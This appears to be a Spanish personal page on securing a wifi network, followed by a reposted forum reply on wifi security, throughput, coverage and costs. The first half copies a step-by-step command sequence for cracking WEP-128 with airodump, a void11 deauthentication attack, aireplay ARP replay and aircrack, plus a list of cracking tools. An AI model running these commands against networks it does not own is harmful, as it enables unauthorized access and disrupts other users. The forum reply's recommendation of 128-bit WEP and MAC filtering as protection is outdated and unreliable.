"Securizar" una red wifi

"Securizar" una red wifi

Para una introducción a los programas de "entrar" en redes wifi, ver este documento.

También son de utilidad los siguientes artículos:

Ars Technica Wifi Blackpaper
Breaking WEP-128 (demo) [tomsnetworking.com] (HOWTO: parte 1, parte 2). Básicamente es usar Airodump (busca paquetes), Void11 (desasocia a los clientes), Aireplay (clona los ARP de asociación), aircrack (coge los datos de airodump y crackea la clave WEP) (NOTA: aircrack-n.n.tgz incluye también Airodump y Aireplay).

Command summary (de la parte 2):

Commands for setting up airodump

iwconfig wlan0 mode monitor
iwconfig wlan0 channel THECHANNELNUM
cd /ramdisk
airodump wlan0 cap

Commands for setting up a void11 deauth attack

switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

Commands to set up aireplay to listen for an ARP packet

switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

Starting up airodump after stopping void11

switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1

Starting aircrack

cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

Utilidades comunes (lista del artículo de tomsnetworking):

Auditor's Security Collection - Contains all the wireless hacking tools already installed
Kismet
Airsnort
Aircrack (includes Aireplay and Airodump)
void11

NOTA: Por cierto, que en el documento de entrar en redes wifi recomiendan una tarj wifi que emite a buena potencia (200mW), sin necesidad de pigtails y otros elementos: Engenius (Senao) 2511 200mW 802.11b PCMCIA card

(A continuación pongo el contenido de este mensaje)

La verdad wifi es seguro como primera anotacion.

Seguridad

Usas WEP a 128bits
Filtrado de MAC
Auth en un servidor radius (un AAA) incluso d-link tiene unos unos buenos.
Manejas CBQ
Metes un firewall en linux
Pones un fakeap con hostap

Fiabilidad

Usas equipos de revision los q van a 108Mb

NOTA: A esto hay que añadir un dato, y es que los AP NO VAN a 54 Mbit por más que lo indique en la caja, y menos aún a 108 por mucho modo turbo que tenga activo el equipo. Las equivalencias sobre una red de cable de un AP de 54 mbit son de aproximadamente 40-45 mbit, y para los AP en modo turbo a 108, del orden de 70-80 mbit (o un pelín más).

NOTA2: Los APs funcionan como un HUB; cuando un cliente tiene baja relación señal/ruido, todos los conectados a ese AP bajan la velocidad a la de ese nodo. Aparte de que comparten el ancho de banda disponible entre todos y que si tienes el AP en modo repetidor (hubs en cascada), se come una parte extra del ancho de banda por esa comunicación entre APs

Cobertura

Dependiendo de la zona usas antenas onmi o direcionales, para los puntos clientes dipolos de 2dB, tambien puedes organizar la red con repetirodores pero te costaria un poquito de tu ancho de banda.

Movilidad

Segun la cobertura q quieras las PC-CARD en los portatiles te irian bien, podes usar equipos dual band (2.4Ghz y 5.8Ghz)

Costos

Segun lo q elijas la verdad pero aqui en bogota colombia costo por punto esta en alrededor de 250K, no de donde seas pero seria q te cotizaras con un provedor local.

Experiencia

La verdad necesitas no es solo poner un AP radiar y listo por arte de WI-FI todo hecho, debes hacer un buen diseño de la red.

Bueno espero te sirva de ayuda mi comentario, y a quien dice q WI-FI es un asco, ¿q te parece un enlace? si echas un vistazo a madridwireless, sincables.net, valenciawireless, guerrilla, olotwireless, pues a ver si conoces un poco mas de los alcances de WI-FI pues ahi enlaces de mas de 16Km sin amp q van de maravilla. No se si tu fibra pueda a resistirlo al mismo costo.